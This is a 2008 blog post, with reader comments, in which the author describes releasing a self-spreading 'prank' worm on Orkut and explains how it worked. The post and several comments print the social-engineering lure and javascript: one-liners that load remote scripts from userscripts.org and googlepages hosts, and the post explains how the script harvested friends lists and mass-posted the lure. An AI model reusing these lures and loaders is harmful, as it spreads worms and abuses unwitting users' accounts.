Thursday, January 24, 2008

Orkut.com vs Cyber Sannyasi

Alright, it seems it's time to write about something I did early this week (21st Jan 2008) on Google's hugely popular Orkut.com. Most Orkut users would have seen this message in their scrapbook, sent by one of their friends...

Here are some tips to make your cell phone battery last longer. Just copy the JavaScript, paste it in your address bar and hit ENTER

javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://userscripts.org/scripts/source/20885.user.js';void(0)

trust me, you’ll find this newsletter informative! [;)] (...ending with a sarcastic wink !)

And, if they did what it suggested, I'm sure they enjoyed the Cyber Sannyasi's cool Technology newsletter, which featured an excellent YouTube video and a wikihow.com article on extending your cell phone battery's life.

For those who're seeing this message for the first time here, be patient; you may see it in your scrapbook soon, as this script is being misused by many users. Orkut has not fixed the bug completely.

Let me briefly explain what this JavaScript did...

When logged into Orkut.com, you're asked by your friend to run this JavaScript from the address bar. This injects the actual prank script from http://userscripts.org/scripts/source/20885.user.js, which runs in the background and renders the newsletter within the same browser window. While the user is engrossed with the YouTube video and battery tips, the script runs asynchronously, performing the actions it was programmed to do. It first sends a read receipt with a timestamp back to the author's scrapbook (that's for my tracking purposes). It then fetches the currently logged-on user's friends list from the Compose.aspx page, builds AJAX-based web requests and posts the scrap message to everyone on that list. The users were completely unaware of what had just happened until somebody on their list did the same. It also forced Orkut to do one more nasty thing... When the user's friend count exceeded 150, with 150 scraps going out rapidly at a gap of 500 milliseconds, Orkut blocked their write access for an indefinite period of time, assuming he/she was a potential spammer [bug? it need not take 150 for the damage... the damage has already been done at this point]. As mentioned earlier, this was just a prank; it never touched users' sensitive information nor transmitted any cookies anywhere, as some bloggers falsely believed (...and got scared). In short, it meant no harm to anybody, apart from the nuisance it created.

The script was later flagged as spam by many and eventually got deleted from the site where it was hosted. The hit counter showed that it was accessed 70,000 times within 36 hrs before it went offline prematurely. Well, on a hugely popular social networking site like orkut.com this number could grow astronomically over time.

Why did I do that ?

Hmm, good question. Well, the story goes like this... Inspired by all those "SCRAP ALL" and tons of other similar scripts (...this one's a mutant of SCRAP ALL), I wanted to take Orkut on a more profound spammer-coaster ride propelled by its own do-all-what-I'm-told ignorant users, I wanted to exploit a bug in Orkut.com, and I wanted to educate the users - in a safe but annoying way - about the harms of running scripts while being logged on. Remember the bold red message I had at the bottom of that newsletter?

Protect your account: Never run any script while logged into orkut.com, no matter what it claims to do. Including this newsletter or "Scrap To All" thingy... LOL!!

Yep, I put the same security tip that often appears in BOLD on the home page after you login. I commend Orkut in this regard for constantly reminding its users not to run any scripts while logged in.

My advice:

I believe there are areas where Orkut can improve its anti-spam and anti-bot techniques. For example, a word filter that immediately pops up a CAPTCHA when someone tries to enter URLs or potential script text in a scrapbook. Employ the same flood-prevention algorithms to disallow users from posting similar messages within a specific time. Currently, this works only on a one-to-one basis. That is, one user cannot send consecutively similar scraps to the same friend, but CAN definitely send the same scrap to every friend on the list, one friend at a time - a potential for *SPAM* like this one [;)] (...another sarcastic wink!). Hello Orkut, if you're reading this post, get this fixed asap, as several users have already started hosting this script at multiple locations and misusing it.

For now, if you want to keep spam off orkut.com, just remember the red bold message above. Or, if you're the one who is really curious to see what happens when you run scripts... then... don't curse script authors for the outcome... It's YOUR PROBLEM & YOU CHOSE TO DO IT!

As a final note, I would like to apologize for the frustration, annoyance, confusion & inconvenience caused to the several thousand users who fell for this prank. I would also like to apologize to the guys at userscripts.org for using their site as a hosting place for this script.

Once again....  I love Orkut.com and let's keep Orkut Beautiful...  [:)] (...a hearty smile) !!

15 comments:

Anonymous said...

you have opened up yet another way of spamming orkut. SPAMMER! i don't like you

Dee said...

Good dude, you are working in a good stream to protect us guys from Orkut spammers. Thanks, keep it up.

Anonymous said...

Good work spamming clueless orkut users. :| Pls do include SPAMMING in your areas of interest.

Anonymous said...

New One on the prowl...

javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://userscripts.org/scripts/source/21098.user.js';void(0)

Thinathayalan (Dheenu) Ganesan said...

Yep, that one's already been reported as spam. Now it's gone. From my tracking log, the one that is still active is hosted by somebody named Vasvi Saran at googlepages...

'http://javascript10034.googlepages.com/20885.user.js'

The spam message would look something like this...

________________________________
Here are some tips to make your cell phone battery last longer..BY VASVI SARAN.. Just copy the JavaScript, paste it in your address bar and PRESS ENTER

javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://javascript10034.googlepages.com/20885.user.js';void(0)

trust me, you'll find this newsletter informative!
___________________________________

I already reported the link as SPAM on Googlepages a couple of days ago.

Now the ball is in Google's court !!

Thinathayalan (Dheenu) Ganesan said...

Yet another one... (misused by Jinesh Jain)

javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://tricks80.googlepages.com/20885.user.js';void(0)

Thinathayalan (Dheenu) Ganesan said...

And another one..

javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://userscripts.googlepages.com/news.user.js';void(0)

Sameer C Thiruthikad said...

http://coolwayfarer.blogspot.com/2008/02/orkut-and-scraps-with-scripts.html

Sunil said...

I got a similar one in my scrap book yesterday

javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://shiva9059.googlepages.com/newsletter.js';void(0)

Thinathayalan (Dheenu) Ganesan said...

Thanks Sunil,
I just happened to see a couple of new ones in my logs...

javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://krunalved.googlepages.com/news.user.js';void(0)

javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://toashishmantri.googlepages.com/amantri.js';void(0)

ashar said...

Good, dude. As it is said, all's well that ends well, although I don't think what you did was good, because you opened the way for spammers and showed a wrong way to those who want to use it in a wrong way.
But still, this blog of yours has rectified all your sins.

free calling guy said...

Hi
Mr Thinathayalan Ganesan,
I find your blog good & informative.

http://freeworld-calls-sms.blogspot.com

Suraj said...

dude, this is crazy. do something useful

Manjiri said...

God... you scared me.

Anyways, that was indeed an eye opener.

Thanks dude, your efforts are appreciated.

r4 ds said...

Hi,
I am currently using Orkut and Facebook; I always choose Orkut for my regular usage..
Because Orkut is a really nice social site, and this article gives me info about Orkut, I really like it..